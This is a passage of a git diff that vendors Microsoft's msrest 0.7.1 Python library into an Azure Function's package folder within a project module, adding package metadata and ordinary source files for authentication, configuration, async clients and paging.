+msrest/__init__.py,sha256=TLrJwx1IGd_NWQnxiPlXoXQUdDUSwjCxgDp9ZxA3h7E,1634 +msrest/__pycache__/__init__.cpython-39.pyc,, +msrest/__pycache__/async_client.cpython-39.pyc,, +msrest/__pycache__/async_paging.cpython-39.pyc,, +msrest/__pycache__/authentication.cpython-39.pyc,, +msrest/__pycache__/configuration.cpython-39.pyc,, +msrest/__pycache__/exceptions.cpython-39.pyc,, +msrest/__pycache__/http_logger.cpython-39.pyc,, +msrest/__pycache__/paging.cpython-39.pyc,, +msrest/__pycache__/serialization.cpython-39.pyc,, +msrest/__pycache__/service_client.cpython-39.pyc,, +msrest/__pycache__/version.cpython-39.pyc,, +msrest/async_client.py,sha256=o8P3U_0HNMLL3ED9_9lEhXzhkCBojbilCu37SxejDfE,4901 +msrest/async_paging.py,sha256=S3xxEudk5tEWq_KbQlzbe7F4AGHD3M2ssHJLtjx3e3U,3352 +msrest/authentication.py,sha256=GSfBrDq3WfZ3G1LqyCrwaRcj9A7kLe34ATwsSmNAZRI,10897 +msrest/configuration.py,sha256=kSkV-4G_t2nuYoaknvQNQtT6fy7UoeT0uOyQJ9sfgqI,3648 +msrest/exceptions.py,sha256=sxCSeKBwv41HP-pXaq5tF6GhJWUgFceSGsNdGysUxaA,7898 +msrest/http_logger.py,sha256=qffLjR2ClkE_jpnZa3btgcVKtf9K-0EmdRn1S3KKJAs,4316 +msrest/paging.py,sha256=_bYJFIn5lWS4L9CTr75DKIRQ5Xol9JizJyquDTn2klQ,5564 +msrest/pipeline/__init__.py,sha256=hkddy5lKohtqjG7DqIaf9JAl4xVwa7-nlBxGiIkkUfQ,12226 +msrest/pipeline/__pycache__/__init__.cpython-39.pyc,, +msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc,, +msrest/pipeline/__pycache__/async_abc.cpython-39.pyc,, +msrest/pipeline/__pycache__/async_requests.cpython-39.pyc,, +msrest/pipeline/__pycache__/requests.cpython-39.pyc,, +msrest/pipeline/__pycache__/universal.cpython-39.pyc,, +msrest/pipeline/aiohttp.py,sha256=A91bO3IaVZ8dgD10cV7m29z5Kzr6VYuKMGpzqxAyvf8,2515 +msrest/pipeline/async_abc.py,sha256=LHo6ntia5yU5MkRTparAlZSnbh9psZh5OIfxzvFVIZc,6497 +msrest/pipeline/async_requests.py,sha256=CH0K8ggLzuhQk3-c-ZeQ0NY0OXyqYWUsOMLpFNkQoc4,5264 +msrest/pipeline/requests.py,sha256=VWDM-roTBfsrkDWCO_QUdgpGdHH3YRy8XPohDgWWy5s,7718 +msrest/pipeline/universal.py,sha256=3t8yOlaVCZYvIosTBzqJ-fyleSm3UYq2PxHgzuJ9gq4,9953 +msrest/polling/__init__.py,sha256=9FBuXsSqpLFmyYTwXFGW6aIDIsSnXzUFOJBvjpDdXzo,1661 +msrest/polling/__pycache__/__init__.cpython-39.pyc,, +msrest/polling/__pycache__/async_poller.cpython-39.pyc,, +msrest/polling/__pycache__/poller.cpython-39.pyc,, +msrest/polling/async_poller.py,sha256=tlnsKwjxLfmO-_N9eS53uecMZvqDCQ0qEjC8BzA9ldw,3873 +msrest/polling/poller.py,sha256=tUm8sVwrocK6qBdrlncVmgwW-SMtFiFEd0Km-Y6oir8,9051 +msrest/py.typed,sha256=dcrsqJrcYfTX-ckLFJMTaj6mD8aDe2u0tkQG-ZYxnEg,26 +msrest/serialization.py,sha256=4wmabsFPGKP28yjbPisv0SQpN77wShNbGzz0ykgIyV0,78879 +msrest/service_client.py,sha256=_nu9UXTYsMczQIdkxBllSSeX9ZMLWR_xWG9OwwFZqV8,15822 +msrest/universal_http/__init__.py,sha256=EmhLLs_qvzwyfVAbNDsPqqe0ddHwREOmw8BpzpV7ttU,16051 +msrest/universal_http/__pycache__/__init__.cpython-39.pyc,, +msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc,, +msrest/universal_http/__pycache__/async_abc.cpython-39.pyc,, +msrest/universal_http/__pycache__/async_requests.cpython-39.pyc,, +msrest/universal_http/__pycache__/requests.cpython-39.pyc,, +msrest/universal_http/aiohttp.py,sha256=WxtJrbx2wQKT5hdtM50BdnfMFvaW0IdWPf9zJhJhzsc,4089 +msrest/universal_http/async_abc.py,sha256=HibWWJWCTPznuFokD4xS3It9PLwBf45Ud88DBTSQZ1A,3249 +msrest/universal_http/async_requests.py,sha256=J7lJvW-WFnC6YeZOyMhM72wXGWMwg24iVgZMi-r9_N0,9175 +msrest/universal_http/requests.py,sha256=EYkSMB-wMhHAhqTuXTZmNrWyb8Bf8c4-jVnVFAzJFIw,16950 +msrest/version.py,sha256=QHs16xc_Qn9HjgW5e8lvq_16_ol3QOYqyyQ9YhlcmEI,1391 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/WHEEL new file mode 100644 index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/top_level.txt new file mode 100644 index 0000000..722e8cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/top_level.txt @@ -0,0 +1 @@ +msrest diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__init__.py new file mode 100644 index 0000000..03a259d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__init__.py @@ -0,0 +1,40 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from .version import msrest_version +from .configuration import Configuration +from .service_client import ServiceClient, SDKClient +from .serialization import Serializer, Deserializer + +__all__ = [ + "ServiceClient", + "SDKClient", + "Serializer", + "Deserializer", + "Configuration" + ] + +__version__ = msrest_version diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..edcc629 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_client.cpython-39.pyc new file mode 100644 index 0000000..ab3aa9b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_paging.cpython-39.pyc new file mode 100644 index 0000000..fb84b71 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/authentication.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/authentication.cpython-39.pyc new file mode 100644 index 0000000..eb85825 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/authentication.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/configuration.cpython-39.pyc new file mode 100644 index 0000000..bfe984f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..e0145f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/http_logger.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/http_logger.cpython-39.pyc new file mode 100644 index 0000000..91b8bda Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/http_logger.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/paging.cpython-39.pyc new file mode 100644 index 0000000..ea609a0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/serialization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/serialization.cpython-39.pyc new file mode 100644 index 0000000..2c5a493 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/serialization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/service_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/service_client.cpython-39.pyc new file mode 100644 index 0000000..d88b5fc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/service_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/version.cpython-39.pyc new file mode 100644 index 0000000..9043978 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_client.py new file mode 100644 index 0000000..257bbb2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_client.py @@ -0,0 +1,127 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import functools +import logging + +from typing import Any, Dict, List, Union, TYPE_CHECKING + +from .universal_http import ClientRequest +from .universal_http.async_requests import AsyncRequestsHTTPSender +from .pipeline import Request, AsyncPipeline, AsyncHTTPPolicy, SansIOHTTPPolicy +from .pipeline.async_requests import ( + AsyncPipelineRequestsHTTPSender, + AsyncRequestsCredentialsPolicy +) +from .pipeline.universal import ( + HTTPLogger, + RawDeserializer, +) + +from .service_client import _ServiceClientCore + +if TYPE_CHECKING: + from .configuration import Configuration # pylint: disable=unused-import + +_LOGGER = logging.getLogger(__name__) + + +class SDKClientAsync: + """The base class of all generated SDK async client. + """ + + def __init__(self, config: 'Configuration') -> None: + self._client = ServiceClientAsync(config) + + async def __aenter__(self): + await self._client.__aenter__() + return self + + async def __aexit__(self, *exc_details): + await self._client.__aexit__(*exc_details) + + +class ServiceClientAsync(_ServiceClientCore): + + def __init__(self, config: 'Configuration') -> None: + super(ServiceClientAsync, self).__init__(config) + + self.config.pipeline = self._create_default_pipeline() # type: ignore + + def _create_default_pipeline(self): + creds = self.config.credentials + + policies = [ + self.config.user_agent_policy, # UserAgent policy + RawDeserializer(), # Deserialize the raw bytes + self.config.http_logger_policy # HTTP request/response log + ] # type: List[Union[AsyncHTTPPolicy, SansIOHTTPPolicy]] + if creds: + if isinstance(creds, (AsyncHTTPPolicy, SansIOHTTPPolicy)): + policies.insert(1, creds) + else: + # Assume this is the old credentials class, and then requests. Wrap it. + policies.insert(1, AsyncRequestsCredentialsPolicy(creds)) + + return AsyncPipeline( + policies, + AsyncPipelineRequestsHTTPSender( + AsyncRequestsHTTPSender(self.config) # Send HTTP request using requests + ) + ) + + async def __aenter__(self): + await self.config.pipeline.__aenter__() + return self + + async def __aexit__(self, *exc_details): + await self.config.pipeline.__aexit__(*exc_details) + + async def async_send(self, request, **kwargs): + """Prepare and send request object according to configuration. + + :param ClientRequest request: The request object to be sent. + :param dict headers: Any headers to add to the request. + :param content: Any body data to add to the request. + :param config: Any specific config overrides + """ + kwargs.setdefault('stream', True) + # In the current backward compatible implementation, return the HTTP response + # and plug context inside. Could be remove if we modify Autorest, + # but we still need it to be backward compatible + pipeline_response = await self.config.pipeline.run(request, **kwargs) + response = pipeline_response.http_response + response.context = pipeline_response.context + return response + + def stream_download_async(self, response, user_callback): + """Async Generator for streaming request body data. + + :param response: The initial response + :param user_callback: Custom callback for monitoring progress. + """ + block = self.config.connection.data_block_size + return response.stream_download(block, user_callback) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_paging.py new file mode 100644 index 0000000..3b124ae --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_paging.py @@ -0,0 +1,79 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from collections.abc import AsyncIterator +import logging + +_LOGGER = logging.getLogger(__name__) + +class AsyncPagedMixin(AsyncIterator): + + def __init__(self, *args, **kwargs): + """Bring async to Paging. + + "async_command" is mandatory keyword argument for this mixin to work. + """ + self._async_get_next = kwargs.get("async_command") + if not self._async_get_next: + _LOGGER.debug("Paging async iterator protocol is not available for %s", + self.__class__.__name__) + + async def async_get(self, url): + """Get an arbitrary page. + + This resets the iterator and then fully consumes it to return the + specific page **only**. + + :param str url: URL to arbitrary page results. + """ + self.reset() + self.next_link = url + return await self.async_advance_page() + + async def async_advance_page(self): + if not self._async_get_next: + raise NotImplementedError( + "The class %s does not support async paging at the moment.", + self.__class__.__name__ + ) + if self.next_link is None: + raise StopAsyncIteration("End of paging") + self._current_page_iter_index = 0 + self._response = await self._async_get_next(self.next_link) + self._derserializer(self, self._response) + return self.current_page + + async def __anext__(self): + """Iterate through responses.""" + # Storing the list iterator might work out better, but there's no + # guarantee that some code won't replace the list entirely with a copy, + # invalidating an list iterator that might be saved between iterations. + if self.current_page and self._current_page_iter_index < len(self.current_page): + response = self.current_page[self._current_page_iter_index] + self._current_page_iter_index += 1 + return response + else: + await self.async_advance_page() + return await self.__anext__() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/authentication.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/authentication.py new file mode 100644 index 0000000..4218ada --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/authentication.py @@ -0,0 +1,306 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Optional, Dict + +import requests +from requests.auth import HTTPBasicAuth +import requests_oauthlib as oauth + + +class Authentication(object): + """Default, simple auth object. + Doesn't actually add any auth headers. + """ + + header = "Authorization" + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + return session or requests.Session() + + +class BasicAuthentication(Authentication): + """Implementation of Basic Authentication. + + :param str username: Authentication username. + :param str password: Authentication password. + """ + + def __init__(self, username, password): + # type: (str, str) -> None + self.scheme = 'Basic' + self.username = username + self.password = password + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers + applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(BasicAuthentication, self).signed_session(session) + session.auth = HTTPBasicAuth(self.username, self.password) + return session + + +class BasicTokenAuthentication(Authentication): + """Simple Token Authentication. + Does not adhere to OAuth, simply adds provided token as a header. + + :param dict[str,str] token: Authentication token, must have 'access_token' key. + """ + + def __init__(self, token): + # type: (Dict[str, str]) -> None + self.scheme = 'Bearer' + self.token = token + + def set_token(self): + # type: () -> None + """Should be used to define the self.token attribute. + + In this implementation, does nothing since the token is statically provided + at creation. + """ + pass + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers + applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(BasicTokenAuthentication, self).signed_session(session) + header = "{} {}".format(self.scheme, self.token['access_token']) + session.headers['Authorization'] = header + return session + + +class OAuthTokenAuthentication(BasicTokenAuthentication): + """OAuth Token Authentication. + + Requires that supplied token contains an expires_in field. + + :param str client_id: Account Client ID. + :param dict[str,str] token: OAuth2 token. + """ + + def __init__(self, client_id, token): + # type: (str, Dict[str, str]) -> None + super(OAuthTokenAuthentication, self).__init__(token) + self.id = client_id + self.store_key = self.id + + def construct_auth(self): + # type: () -> str + """Format token header. + + :rtype: str + """ + return "{} {}".format(self.scheme, self.token) + + def refresh_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Return updated session if token has expired, attempts to + refresh using refresh token. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + return self.signed_session(session) + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = session or requests.Session() # Don't call super on purpose, let's "auth" manage the headers. + session.auth = oauth.OAuth2(self.id, token=self.token) + return session + + +class KerberosAuthentication(Authentication): + """Kerberos Authentication + Kerberos Single Sign On (SSO); requires requests_kerberos is installed. + + :param mutual_authentication: whether to require mutual authentication. Use values from requests_kerberos import REQUIRED, OPTIONAL, or DISABLED + """ + def __init__(self, mutual_authentication=None): + super(KerberosAuthentication, self).__init__() + self.mutual_authentication = mutual_authentication + + def signed_session(self, session=None): + """Create requests session with Negotiate (SPNEGO) headers applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(KerberosAuthentication, self).signed_session(session) + try: + from requests_kerberos import HTTPKerberosAuth + except ImportError: + raise ImportError("In order to use KerberosAuthentication please do 'pip install requests_kerberos' first") + if self.mutual_authentication: + session.auth = HTTPKerberosAuth(mutual_authentication=self.mutual_authentication) + else: + session.auth = HTTPKerberosAuth() + return session + + +class ApiKeyCredentials(Authentication): + """Represent the ApiKey feature of Swagger. + + Dict should be dict[str,str] to be accepted by requests. + + :param dict[str,str] in_headers: Headers part of the ApiKey + :param dict[str,str] in_query: ApiKey in the query as parameters + """ + def __init__(self, in_headers=None, in_query=None): + # type: (Optional[Dict[str, str]], Optional[Dict[str, str]]) -> None + super(ApiKeyCredentials, self).__init__() + if in_headers is None: + in_headers = {} + if in_query is None: + in_query = {} + + if not in_headers and not in_query: + raise ValueError("You need to define in_headers or in_query") + + self.in_headers = in_headers + self.in_query = in_query + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with ApiKey. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(ApiKeyCredentials, self).signed_session(session) + session.headers.update(self.in_headers) + try: + # params is actually Union[bytes, MutableMapping[Text, Text]] + session.params.update(self.in_query) # type: ignore + except AttributeError: # requests.params can be bytes + raise ValueError("session.params must be a dict to be used in ApiKeyCredentials") + return session + + +class CognitiveServicesCredentials(ApiKeyCredentials): + """Cognitive Services authentication. + + :param str subscription_key: The CS subscription key + """ + + _subscription_key_header = 'Ocp-Apim-Subscription-Key' + + def __init__(self, subscription_key): + # type: (str) -> None + if not subscription_key: + raise ValueError("Subscription key cannot be None") + super(CognitiveServicesCredentials, self).__init__( + in_headers={ + self._subscription_key_header: subscription_key, + 'X-BingApis-SDK-Client': 'Python-SDK' + } + ) + + +class TopicCredentials(ApiKeyCredentials): + """Event Grid authentication. + + :param str topic_key: The Event Grid topic key + """ + + _topic_key_header = 'aeg-sas-key' + + def __init__(self, topic_key): + # type: (str) -> None + if not topic_key: + raise ValueError("Topic key cannot be None") + super(TopicCredentials, self).__init__( + in_headers={ + self._topic_key_header: topic_key, + } + ) + + +class DomainCredentials(ApiKeyCredentials): + """Event Grid domain authentication. + + :param str domain_key: The Event Grid domain key + """ + + _domain_key_header = 'aeg-sas-key' + + def __init__(self, domain_key): + # type: (str) -> None + if not domain_key: + raise ValueError("Domain key cannot be None") + super(DomainCredentials, self).__init__( + in_headers={ + self._domain_key_header: domain_key, + } + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/configuration.py new file mode 100644 index 0000000..594679e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/configuration.py @@ -0,0 +1,103 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + + +try: + import configparser + from configparser import NoOptionError +except ImportError: + import ConfigParser as configparser # type: ignore + from ConfigParser import NoOptionError # type: ignore + +from typing import TYPE_CHECKING, Optional, Dict, List, Any, Callable, Union # pylint: disable=unused-import + +from .pipeline import Pipeline +from .universal_http.requests import ( + RequestHTTPSenderConfiguration +) +from .pipeline.universal import ( + UserAgentPolicy, + HTTPLogger, +) + +if TYPE_CHECKING: + from .pipeline import AsyncPipeline + +class Configuration(RequestHTTPSenderConfiguration): + """Client configuration. + + :param str baseurl: REST API base URL. + :param str filepath: Path to existing config file (optional). + """ + + def __init__(self, base_url, filepath=None): + # type: (str, Optional[str]) -> None + + super(Configuration, self).__init__(filepath) + # Service + self.base_url = base_url + + # User-Agent as a policy + self.user_agent_policy = UserAgentPolicy() + + # HTTP logger policy + self.http_logger_policy = HTTPLogger() + + # The pipeline. We don't know until a ServiceClient use this configuration if it will be sync or async + # We instantiate with a default empty Pipeline for mypy mostly, trying to use a pipeline from a pure + # configuration object doesn't make sense. + self.pipeline = Pipeline() # type: Union[Pipeline, AsyncPipeline] + + # If set to True, ServiceClient will own the sessionn + self.keep_alive = False + + # Potential credentials pre-declared + self.credentials = None + + if filepath: + self.load(filepath) + + @property + def user_agent(self): + # type: () -> str + """The current user agent value.""" + return self.user_agent_policy.user_agent + + def add_user_agent(self, value): + # type: (str) -> None + """Add value to current user agent with a space. + + :param str value: value to add to user agent. + """ + self.user_agent_policy.add_user_agent(value) + + @property + def enable_http_logger(self): + return self.http_logger_policy.enable_http_logger + + @enable_http_logger.setter + def enable_http_logger(self, value): + self.http_logger_policy.enable_http_logger = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/exceptions.py new file mode 100644 index 0000000..bf10a4a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/exceptions.py @@ -0,0 +1,202 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the 